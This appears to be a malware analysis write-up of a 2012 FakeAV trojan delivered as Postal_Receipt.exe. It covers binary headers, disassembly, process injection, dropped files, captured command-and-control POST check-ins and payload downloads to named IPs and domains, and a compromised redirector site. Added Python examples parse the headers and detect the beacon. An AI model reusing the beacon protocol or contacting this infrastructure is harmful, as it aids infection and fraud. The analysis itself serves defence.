0090   72 9E B5 F6 99 99 04 DB FB DE BE EF EF 3E EF FB    r............>..
00A0   CF CB 8F 39 67 7F AC BD F6 DA 6B AF BD F6 5A FB    ...9g.....k...Z.
And this zip file contains a malware. What's inside?
// extract it...
$ unzip ./Receipt.zip
Archive:  ./Receipt.zip
extracting: Postal_Receipt.exe
//File timestamps..
-rwxr-xr-x  1 xxx xxx 154624 Nov 23 16:58 Postal_Receipt.exe* <=== see the creation date, new!

Binary Analysis

Let's "surgery" this Postal_Receipt.exe; it looks like a plain PE:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   D1 46 30 9D 95 27 5E CE 95 27 5E CE 95 27 5E CE    .F0..'^..'^..'^.
0090   06 69 C6 CE 94 27 5E CE 8E BA F5 CE B5 27 5E CE    .i...'^......'^.
00A0   8E BA C0 CE 86 27 5E CE 8E BA F4 CE E3 27 5E CE    .....'^......'^.
00B0   9C 5F CD CE 90 27 5E CE 95 27 5F CE CB 27 5E CE    ._...'^..'_..'^.
00C0   8B 75 DA CE 94 27 5E CE 8B 75 CF CE 94 27 5E CE    .u...'^..u...'^.
00D0   52 69 63 68 95 27 5E CE 00 00 00 00 00 00 00 00    Rich.'^.........
00E0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00    ........PE..L...
00F0   C0 63 AF 50 00 00 00 00 00 00 00 00 E0 00 03 01    .c.P............
Some details of binary:
Sections:
   .text 0x1000 0xcfe1 53248
   .rdata 0xe000 0x29d0 10752
   .data 0x11000 0x3a84 7680
   .rsrc 0x15000 0x13ed0 81920
Entry Point at 0xe87
Virtual Address is 0x401a87
Compiler: Microsoft Visual C++ 8
CRC Check Failed, Claimed:  0 Actual:  191423
Compile Time: 0x50AF63C0 [Fri Nov 23 11:53:36 2012 UTC]
MIMEType                 : application/octet-stream
Subsystem                : Windows GUI
MachineType              : Intel 386 or later, and compatibles
TimeStamp                : 2012:11:23 11:53:36+00:00
FileType                 : Win32 EXE
PEType                   : PE32
CodeSize                 : 53248
LinkerVersion            : 9.0
EntryPoint               : 0x1a87
InitializedDataSize      : 100352
SubsystemVersion         : 5.0
OSVersion                : 5.0
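Added example (my own, not from the page): parsing the DOS and COFF headers out of the hex dump above with Python and checking that they agree with the details listed: e_lfanew 0xE8, 4 sections, i386, and the 0x50AF63C0 compile timestamp resolving to 2012-11-23 11:53:36 UTC. The optional header starts beyond the dumped 0x100 bytes, so the entry point is not recoverable from this dump.

```python
import struct
from datetime import datetime, timezone

# First 0x100 bytes of Postal_Receipt.exe, transcribed from the hex dump above
# (ASCII column dropped; the parser would ignore it anyway).
DUMP = """\
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0030 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00
0080 D1 46 30 9D 95 27 5E CE 95 27 5E CE 95 27 5E CE
0090 06 69 C6 CE 94 27 5E CE 8E BA F5 CE B5 27 5E CE
00A0 8E BA C0 CE 86 27 5E CE 8E BA F4 CE E3 27 5E CE
00B0 9C 5F CD CE 90 27 5E CE 95 27 5F CE CB 27 5E CE
00C0 8B 75 DA CE 94 27 5E CE 8B 75 CF CE 94 27 5E CE
00D0 52 69 63 68 95 27 5E CE 00 00 00 00 00 00 00 00
00E0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00
00F0 C0 63 AF 50 00 00 00 00 00 00 00 00 E0 00 03 01
"""

COFF_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
              0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
MACHINES = {0x014C: "i386", 0x8664: "x86-64"}


def parse_hexdump(text):
    """Rebuild bytes from 'OFFSET XX XX ...' lines; trailing ASCII is ignored."""
    out = bytearray()
    for line in text.strip().splitlines():
        tokens = line.split()
        if int(tokens[0], 16) != len(out):
            raise ValueError("gap in dump at offset %s" % tokens[0])
        out += bytes(int(t, 16) for t in tokens[1:17])
    return bytes(out)


def characteristics_flags(value):
    return [name for bit, name in sorted(COFF_FLAGS.items()) if value & bit]


def parse_headers(image):
    """DOS header -> e_lfanew -> PE signature -> 20-byte COFF file header."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=0x%x" % e_lfanew)
    machine, nsect, tstamp, _symtab, _nsyms, opt_size, chars = \
        struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "machine_name": MACHINES.get(machine, "unknown"),
        "sections": nsect,
        "timestamp": tstamp,
        "compiled": datetime.fromtimestamp(tstamp, timezone.utc)
                            .strftime("%Y-%m-%d %H:%M:%S UTC"),
        "optional_header_size": opt_size,
        "characteristics": chars,
        "flags": characteristics_flags(chars),
        # "Rich" between the DOS stub and the PE header is an MSVC linker artefact,
        # consistent with the "Microsoft Visual C++" verdict above.
        "rich_header": b"Rich" in image[0x40:e_lfanew],
    }


HDR = parse_headers(parse_hexdump(DUMP))

if __name__ == "__main__":
    for key, val in HDR.items():
        shown = hex(val) if isinstance(val, int) and not isinstance(val, bool) else val
        print("%-22s %s" % (key, shown))
```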
It has the strings here --->>[CLICK]
These are the strings with calls -->>[CLICK]
It also has the Calls/DLL list here -->>[CLICK]
And the Functions list here --->>[CLICK]
*) Those similar functions are often seen in crypted malwares...
//Upon start this binary gets the environment & executes the command line:
loc_40191A:
push    58h
push    offset unk_40FF80
call    sub_403D40
lea     eax, [ebp-68h]
push    eax             ; lpStartupInfo
call    ds:GetStartupInfoW
xor     esi, esi
cmp     dword_414A6C, esi
jnz     short loc_401945
 ↓
loc_401945:
loc_401958:
loc_401953:
loc_40198E:
loc_40199F:
loc_4019B0:
 ↓
loc_4019C9:
call    ds:GetCommandLineA
mov     dword_414A68, eax
call    sub_405C67
mov     lpMem, eax
call    sub_405BAC
test    eax, eax
jns     short loc_4019EF 
 ↓
loc_4019EF:
loc_401A00:
loc_401A13:
loc_401A24:
//Other OPs, i.e. creating+writing files, Get/Create/Terminate Process acts -->>[CLICK]
//Also a dialog-box OP like below w/ File Operations, implying a GUI ↓ I see a lot of these in FakeAV malwares...
.text:0040DF5A  align 10h
.text:0040DF60  push    ebp
.text:0040DF61  mov     ebp, esp
.text:0040DF63  mov     eax, ds:ChooseFontW ; Create a Font common dialog box
.text:0040DF68  mov     dword_412C84, eax
.text:0040DF6D  mov     ecx, ds:GetFileTitleW ; Extract FileName from FullName
.text:0040DF73  mov     dword_412C88, ecx
.text:0040DF79  mov     edx, ds:PageSetupDlgW ; Create a Page Setup dialog box for
.text:0040DF79                          ; specifying the attributes of a printed page
.text:0040DF7F  mov     dword_412C8C, edx
.text:0040DF85  mov     eax, ds:FindTextW ; Create a system-defined modeless
.text:0040DF85                          ; dialog box for text-search
.text:0040DF8A  mov     dword_412C90, eax
.text:0040DF8F  mov     ecx, ds:PrintDlgExW
.text:0040DF95  mov     dword_412C94, ecx
.text:0040DF9B  mov     edx, ds:GetFileTitleW ; Extract FileName from FullName
.text:0040DFA1  mov     dword_412C98, edx
.text:0040DFA7  mov     eax, ds:GetOpenFileNameW ; Create an Open common dialog box
.text:0040DFAC  mov     dword_412C9C, eax
.text:0040DFB1  mov     ecx, ds:ReplaceTextW ; Create a system-defined modeless
.text:0040DFB1                          ; dialog box for text-replace
.text:0040DFB7  mov     dword_412CA0, ecx
.text:0040DFBD  mov     edx, ds:CommDlgExtendedError ; Get a common dialog box error code
.text:0040DFC3  mov     dword_412CA4, edx
.text:0040DFC9  mov     eax, ds:GetSaveFileNameW ; Create a Save common dialog box
.text:0040DFCE  mov     dword_412CA8, eax
.text:0040DFD3  mov     ecx, ds:ChooseFontW ; Create a Font common dialog box
.text:0040DFD9  mov     dword_412CAC, ecx
.text:0040DFDF  pop     ebp
.text:0040DFE0  retn

Behaviour Analysis

This is the result if you run the software; I'll make it brief.
//File activities...
//self deletion of the original sample..
  C:\unixfreaxjp-test\sample.exe 
////drops & self-copied into...
1. C:\Documents and Settings\User\Local Settings\Application Data\hdjusttt.exe
*) This name is random in every case...
//Created processes...
//By: origin hdjusttt.exe 249d145396baa974753e41d79982ae81190ffeafd24b9acdadc2d451fdb8f81d , 
//path=C:\Documents and Settings\User\Local Settings\Application Data\hdjusttt.exe (sample)
  |
  +--  0xf0 notepad.exe C:\WINDOWS\system32\NOTEPAD.EXE
  +--  0x7e4 svchost.exe C:\WINDOWS\system32\svchost.exe (Foreign Memory Regions Written)

//With thread below...
  0xf0 notepad.exe 0xf4 0x7c810867
    |
    +--0x348 svchost.exe 0x784 0x7c810856 (Foreign Memory Regions Written)
    +--0x3e8 svchost.exe 0x94 0x7c810856 (Foreign Memory Regions Written)
    +--0x7e4 svchost.exe 0xb8 0x7c810867 (Foreign Memory Regions Written)
//Three important Registry changes detected...
//Creating fake NotePad...
HKCU\Software\Microsoft\Notepad

//Internet settings...
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings 
Type: REG_BINARY/REG_BINARY 
From: 56/56 
To:  XX/XX //binary...

//malware exec start origin regists...
Key: HKU\..\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders
Type: Local AppData
New: C:\DocumentsandSettings\Administrator\LocalSettings\Application Data  
//Downloads and install FakeAV components:
date        hrs     size  filename                              md5
-----------------------------------------------------------------------------------------------
2012/11/24  20:53   2,960 945C33B96395E50D0000945B9F62EA33      811cfb9b55bd85562a5466918ebd2c63          
2012/11/24  20:09 443,392 945C33B96395E50D0000945B9F62EA33.exe  62ed7e0847e333064d75555446d92bff            
2012/11/24  20:09   4,286 945C33B96395E50D0000945B9F62EA33.ico  f979390b4527bed0661ff1130202a1b5           
//And it runs like this (captured in a screenshot)... Yes, the strange desktop task icons show you a fake alert... And Notepad suddenly popped up, I suppose to make users feel that the PC is currently infected (LOL)
//Then it started to scan your PC with fake scans & licking everything... After the scan is done it pops up this message to make you pay to continue using your PC.. (in the screenshot I marked the support center & the non-refund terms)
It dropped the malware saved data below: File: 945C33B96395E50D0000945B9F62EA33 MD5: 811cfb9b55bd85562a5466918ebd2c63, Contents:
0000   41 3B 11 3E 7D 59 5F 25 69 48 32 1B 6C 64 69 18    A;.>}Y_%iH2.ldi.
0010   71 5A 7A 70 1C 15 72 70 DB 42 18 DA 74 1F FB 00    qZzp..rp.B..t...
0020   94 A0 F4 CB 2A D9 90 09 FF A9 2C F8 57 27 9E 71    ....*.....,.W'.q
0030   99 78 6D 9F 50 87 F6 7F 5A AE 72 C7 CD 45 BD 80    .xm.P...Z.r..E..
0040   31 8F F0 0F 04 6B 4B 46 3D 68 F0 E7 91 89 C5 B3    1....kKF=h......
0050   70 45 14 80 9F 3E D4 2B 19 45 D7 7C C2 4A 98 AA    pE...>.+.E.|.J..
0060   AA 39 19 F8 E8 68 4D 16 DB B2 CF CE 70 5D 69 35    .9...hM.....p]i5
0070   FA A1 C7 A3 DB 84 31 44 D4 F3 05 0C C1 CB 91 06    ......1D........
0080   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0090   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00A0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00B0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00C0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00D0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00E0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
00F0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0100   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0110   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0120   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0130   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0140   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0150   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0160   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0170   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0180   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
0190   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01A0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01B0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01C0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01D0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01E0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
01F0   FF A9 2C F8 57 27 9E 71 FF A9 2C F8 57 27 9E 71    ..,.W'.q..,.W'.q
Not only the above crime: this software actually sends your data outside; see the PoC in the Network analysis below...

Network analysis

Three communications occurred, to 217.76.130.213, 59.126.131.132 and 61.222.241.208. The first network trace was the download of the FakeAV program from Host: proyectosnavarra.es (217.76.130.213), noted below:
0000  00 a0 c9 22 b0 ee 00 1b  8b 69 9d 9d 08 00 45 00   ...".... .i....E.
0010  00 b7 8f 3c 40 00 80 06  47 38 c0 a8 07 02 d9 4c   ...<@... G8.....L
0020  82 d5 06 6b 00 50 b4 7c  5e fe 0e 68 c8 3f 50 18   ...k.P.| ^..h.?P.
0030  7d 78 a9 18 00 00 47 45  54 20 2f 39 34 35 43 33   }x....GE T /945C3
0040  33 42 39 36 33 39 35 45  35 30 44 30 30 30 30 39   3B96395E 50D00009
0050  34 35 42 39 46 36 32 45  41 33 33 2e 65 78 65 20   45B9F62E A33.exe
↑It says GET /945C33B96395E50D0000945B9F62EA33.exe HTTP/1.0. After it got installed I recorded all of the communication PCAP data, highlighted below: //Sending data to 59.126.131.132:8080 using HTTP POST
POST /index.php HTTP/1.1
Host: 59.126.131.132:8080:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 848

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"

6505105311892209
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"

431718
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"

201
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"

1182
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"

{BC471CE6-8BA5-4705-B840-5CEA99636DEC}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"

5#2#3#0#2600#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"

0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"

0
--1BEF0A57BE110FD467A--
And got the reply below (NOTE: it saves data on your PC):
HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 24 Nov 2012 11:46:15 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding
Content-Length: 823

HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:46:22 GMT
Server: Apache/2.2.16
Content-Length: 637
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%-.+.*+.(**#"))+"'4hr.%.'ywtxp%.'m%.***.'4m%.'h%*/+5*(.5--5)*,!#+#+.
*,#5,,5*+(5./!#+#+.*##5)*)5*.-5*#+!#+#+.*##5/+5*/*5/!/(/.-.)+)5*-"5))/5)
+)!#+#+.)**5*,)5**)5,!#+#+./-5*+.5*)*5#-!/(/.-..+5))5*(-5*.+!#+#+.."5*)-
5*(*5*()!#+#+.."5).5*#"5)(/!#+#+.-*5)))5)/*5)+#!#+#+.--5)()5*/.5*,/!---,.
#*5"(5)/#5*.)!#+#+.#)5**(5)+/5))#!#+#+."*5*)*5"+5#+!#+#+."*5)+.5-(5*"/!/(/
.-.wt}o|nu+*5in.kthoytc"+*5in.hytwo,*5in.hwtktpzu)*5in.o~izurzu***5in'4h%.
'h~w}rk%."5*)-5*(*5*()'4h~w}rk%.'4ywtxp%--1BEF0A57BE110FD467A--
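The check-in above is plain multipart/form-data, so it can be parsed and matched without any protocol decoding. As an added example (not code from the original post), here is a small Python parser for that body plus a detection heuristic built on three traits visible in the capture: the exact field set the FakeAV posts (sid, up, wbfl, v, ping, guid, wv, ms, sr, ar), the doubled port in its Host header ("59.126.131.132:8080:80", which no real browser sends), and the GUID-shaped machine identifier. The sample body is constructed from the captured field values, laid out as well-formed multipart:

```python
"""Parse the multipart/form-data check-in captured above and flag it on the
traits of the capture.  Added example, not code from the original post."""
import re

BOUNDARY = "1BEF0A57BE110FD467A"

# Constructed from the captured POST above: same headers and field values,
# laid out as well-formed multipart (CRLF line ends) so a parser can read it.
CAPTURED_HEADERS = {
    "Host": "59.126.131.132:8080:80",
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)",
    "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
}

def _part(name, value):
    return '--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n' % (BOUNDARY, name, value)

CAPTURED_BODY = "".join([
    _part("sid", "6505105311892209"),
    _part("up", "431718"),
    _part("wbfl", ""),
    _part("v", "201"),
    _part("ping", "1182"),
    _part("guid", "{BC471CE6-8BA5-4705-B840-5CEA99636DEC}"),
    _part("wv", "5#2#3#0#2600#0"),
    _part("ms", "0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0"),
    _part("sr", "0"),
    _part("ar", "0"),
]) + "--%s--\r\n" % BOUNDARY

# Field names seen in both check-ins above (to 59.126.131.132 and 61.222.241.208).
CHECKIN_FIELDS = frozenset(["sid", "up", "wbfl", "v", "ping", "guid", "wv", "ms", "sr", "ar"])
GUID_RE = re.compile(r"^\{[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$")

def boundary_of(headers):
    """Pull the boundary token out of the Content-Type header (None if absent)."""
    m = re.search(r'boundary="?([^";]+)"?', headers.get("Content-Type", ""))
    return m.group(1) if m else None

def parse_multipart(body, boundary):
    """Return {field name: value}.  Each part is: delimiter line, headers,
    blank line, value.  Accepts CRLF or LF line ends; a part with no text
    after its blank line (like 'wbfl' above) yields an empty string."""
    body = body.replace("\r\n", "\n")
    fields = {}
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):          # closing delimiter: "--boundary--"
            break
        head, _, value = chunk.lstrip("\n").partition("\n\n")
        m = re.search(r'name="([^"]*)"', head)
        if m:
            fields[m.group(1)] = value.rstrip("\n")
    return fields

def checkin_indicators(headers, fields):
    """List the traits of the capture above that this request shares:
    'field-set'    the form fields are exactly the check-in set
    'doubled-port' Host ends in two ':port' suffixes (malformed header)
    'guid-field'   a GUID-shaped 'guid' value, the bot's machine identifier."""
    found = []
    if frozenset(fields) == CHECKIN_FIELDS:
        found.append("field-set")
    if re.search(r":\d+:\d+$", headers.get("Host", "")):
        found.append("doubled-port")
    if GUID_RE.match(fields.get("guid", "")):
        found.append("guid-field")
    return found

if __name__ == "__main__":
    f = parse_multipart(CAPTURED_BODY, boundary_of(CAPTURED_HEADERS))
    print(f)
    print(checkin_indicators(CAPTURED_HEADERS, f))
```

Run against a proxy or IDS log that keeps POST bodies, a hit on all three indicators is a strong match for this family's beacon; the doubled-port Host header alone is already worth an alert, since it is a client bug and not something a browser or normal library produces.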
//Then it sends data to 61.222.241.208:8080 via HTTP POST, as before...
POST /index.php HTTP/1.1
Host: 61.222.241.208:8080:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 848

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"

3549713911081243
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"

689468
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"

201
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"

1182
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"

{BC471CE6-8BA5-4705-B840-5CEA99636DEC}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"

5#2#3#0#2600#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"

0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"

0
--1BEF0A57BE110FD467A--
And got a reply too↓ (NOTE: it saves data on your PC)
HTTP/1.1 200 OK
Server: nginx/1.2.5
Date: Sat, 24 Nov 2012 11:53:53 GMT
Content-Type: text/html
Content-Length: 823
Connection: keep-alive
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:50:37 GMT
Server: Apache/2.2.16
Content-Length: 637
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%(./",*("**+#*)/('4hr.%.'ywtxp%.'m%.***.'4m%.'h%*/+5*(.5--5)*,!#+#+.*,#5,,
5*+(5./!#+#+.*##5)*)5*.-5*#+!#+#+.*##5/+5*/*5/!/(/.-.)+)5*-"5))/5)+)!#+#+.)**5
*,)5**)5,!#+#+./-5*+.5*)*5#-!/(/.-..+5))5*(-5*.+!#+#+.."5*)-5*(*5*()!#+#+.."5).
5*#"5)(/!#+#+.-*5)))5)/*5)+#!#+#+.--5)()5*/.5*,/!---,.#*5"(5)/#5*.)!#+#+.#)5**
(5)+/5))#!#+#+."*5*)*5"+5#+!#+#+."*5)+.5-(5*"/!/(/.-.wt}o|nu+*5in.kthoytc"+*5in.
hytwo,*5in.hwtktpzu)*5in.o~izurzu***5in'4h%.'h~w}rk%-*5)))5)/*5)+#'4h~w}rk%.'4y
wtxp%--1BEF0A57BE110FD467A--
//Then it looked up the DNS for sys.cougarsupport.net:
TestPC --> 8.8.8.8   DNS Standard query A sys.cougarsupport.net
8.8.8.8 --> TestPC   DNS Standard query response A 178.32.29.188
0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  00 43 01 39 00 00 80 11  61 65 c0 a8 07 54 08 08   .C.9.... ae...T..
0020  08 08 04 b4 00 35 00 2f  b5 9d d5 31 01 00 00 01   .....5./ ...1....
0030  00 00 00 00 00 00 03 73  79 73 0d 63 6f 75 67 61   .......s ys.couga
0040  72 73 75 70 70 6f 72 74  03 6e 65 74 00 00 01 00   rsupport .net....
0050  01                 
Which ends up in the request for the support center web site...
GET /?nid=9455E50D HTTP/1.1
Accept: */*
Accept-Language: ja
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: sys.cougarsupport.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 24 Nov 2012 11:54:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

4e44

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "h00p://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="h00p://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title> System Progressive Protection </title>
        <meta h00p-equiv="Content-type" content="text/html;charset=UTF-8" />
        <link rel="stylesheet" type="text/css" href="styles/main.css" />
    </head>

    <body>
        <div class="wrap">
            <div class="left-part">
                <div class="logo-img">
                    <img src="/img/system-progressive-protection.png" alt="logo" />
                </div>  :
  :
Here's the snapshot of the support page of this sh*t↓

IP Infector's History Analysis

As we see, the A record leads us to IPs 217.76.130.213 and 217.76.130.3. I think I saw 217.76.130.213 before... searching the notes, I found the previous infections below on that IP:
//infector records, source: SPAM
h00p://cimatfoto.com/
h00p://grupoestudio.com/default.html
//trojan dropped records, source also SPAM
h00p://bc2bc.eu/imagenes/explorer-7.0.exe
h00p://grupoestudio.com/get_flash_update.exe
Let's see the current status of this infector IP; I suspected an EK is active there and used the recent URL... //fetch...
--17:03:36--  h00p://cimatfoto.com/
           => `index.html'
Resolving cimatfoto.com... 217.76.130.213
Connecting to cimatfoto.com|217.76.130.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.1 200 OK
Content-Length: 481
Content-Type: text/html
Content-Location: h00p://cimatfoto.com/index.htm
Last-Modified: Wed, 29 Feb 2012 11:59:52 GMT
Accept-Ranges: bytes
ETag: "caa60a5d9f6cc1:958"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 24 Nov 2012 08:06:03 GMT
Connection: keep-alive
Length: 481 [text/html]
17:03:37 (12.07 MB/s) - `index.html' saved [481/481]
It is a frame-based (frameset) redirector... to m1.htm & m2.htm
$ cat index.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Cimat Foto s.a.</title>
</head>
<frameset rows="1,*" cols="*" framespacing="0" frameborder="NO" border="0">
  <frame src="m1.htm" name="m1" scrolling="NO" noresize id="m1">
  <frame src="m2.htm" name="m2" id="m2">
</frameset>
<noframes><body>
</body></noframes>
</html>
And we found what looks like the infector in m2.htm↓
--17:07:54--  h00p://cimatfoto.com/m2.htm
           => `m2.htm'
Resolving cimatfoto.com... 217.76.130.213
Connecting to cimatfoto.com|217.76.130.213|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 736 [text/html]
17:07:55 (20.76 MB/s) - `m2.htm' saved [736/736]

$ cat m2.htm

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"h00p://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta h00p-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Documento sin título</title>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_goToURL() { //v3.0
  var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
  for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
}
//-->
</script>
</head>
<body onLoad="MM_goToURL('parent.frames[\'m2\']','WEB/Inicio.html');return document.MM_returnValue">
<img src="h00p://cgi.cimatfoto.com/Count.exe?df=cimatfoto.com.c1&dd=57chevy&sh=F&ft=0&pad=F">
</body>
</html>
